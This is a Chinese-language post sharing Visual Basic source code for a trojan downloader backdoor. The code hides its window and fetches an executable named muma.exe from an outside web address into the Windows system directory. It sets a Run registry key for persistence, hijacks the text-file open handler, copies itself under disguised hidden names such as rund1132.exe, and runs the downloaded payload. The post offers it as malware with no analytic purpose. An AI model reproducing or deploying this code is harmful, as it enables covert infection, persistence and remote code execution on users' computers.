VB下載者後門
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
'延遲1秒
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
' Note that if you declare the lpData parameter as String, you must pass it By Value.
Const Key_Run = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Private Const HKEY_CURRENT_USER = &H80000001
Const HKEY_LOCAL_MACHINE = &H80000002
Const REG_SZ = 1
' Unicode nul terminated string
Dim LhKey As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Sys As String '系統目錄
Private US As String '自己
Private Tmp As String '暫存檔案夾
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Sub SaveString(hKey As Long, strPath As String, strValue As String, strData As String)
Dim keyHand As Long
Dim R As Long
R = RegCreateKey(hKey, strPath, keyHand)
R = RegSetValueEx(keyHand, strValue, 0, REG_SZ, ByVal strData, LenB(StrConv(strData, vbFromUnicode))) 'LenB(StrConv(strData, vbFromUnicode))中文長度以2計算
R = RegCloseKey(keyHand)
End Sub
Private Sub Form_Load()
On Error Resume Next
Dim RegEdit As Object, Apppath As String
Dim Cp As String
Dim Ret As Long
Dim sCurrentPath As String, sSystemDir As String
sCurrentPath = App.Path & "\" & App.EXEName & ".exe"
Form1.Visible = False
Sys = String(255, 0)
Ret = GetSystemDirectory(Sys, 255)
Sys = Left(Sys, Ret) '獲得系統目錄
US = String(1024, 0) '獲得自己的完整路徑
Ret = GetModuleFileName(0, US, 1024)
US = Left(US, InStr(US, Chr(0)) - 1)
Tmp = Temp '獲得完整臨時目錄
If Dir(Sys & "\" & "muma.exe") = "" Then
Ret = URLDownloadToFile(0, "http://www.6dsoft.cn/muma.exe", Sys & "\muma.exe", 0, 0)
End If
Cp = Sys & "\system.exe" '你在 Google 輸入 inetdbs.exe 就可以找得到該病毒的介紹了
Ret = RegCreateKey(HKEY_LOCAL_MACHINE, Key_Run, LhKey) '寫入註冊表,以便開機重啟
Ret = RegSetValueEx(LhKey, "server", 0&, REG_SZ, ByVal Cp, Len(Cp) + 1)
Ret = RegCloseKey(LhKey)
If InStr(UCase(US), "INETDBS") = 0 Then
End If
Apppath = IIf(Right(App.Path, 1) = "\", Left(App.Path, Len(App.Path) - 1), App.Path)
'取得當前路徑,如果是在根目錄下就要去掉一個“\"
Set RegEdit = CreateObject("WScript.Shell")
RegEdit.regwrite "HKEY_CLASSES_ROOT\txtfile\shell\open\command\", Sys & "\" & "rund1132" & ".exe %1"
On Error Resume Next
Dim cmd As String
cmd = Command()
If cmd <> "" Then
Shell "NOTEPAD.EXE " & cmd, vbNormalFocus
End If
On Error Resume Next
FileCopy sCurrentPath, Sys & "\System.exe"
On Error Resume Next
FileCopy sCurrentPath, Sys & "\" & "\rund1132.exe"
SetAttr Sys & "\" & "\rund1132.exe", 7
'判斷程式是否下在運行
If App.PrevInstance Then
End
End If
Do While Dir(Sys & "\" & "muma.exe") = ""
Ret = URLDownloadToFile(0, "url", Sys & "\muma.exe", 0, 0)
Call Sleep(100000)
Loop
Shell Sys & "\" & "muma" & ".exe", vbNormalFocus
End Sub
模組:
Option Explicit
Public Const HKEY_CURRENT_USER = &H80000001
Public Const REG_DWORD = 4
Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
|
收藏
分享
讚
幹
分享
分享
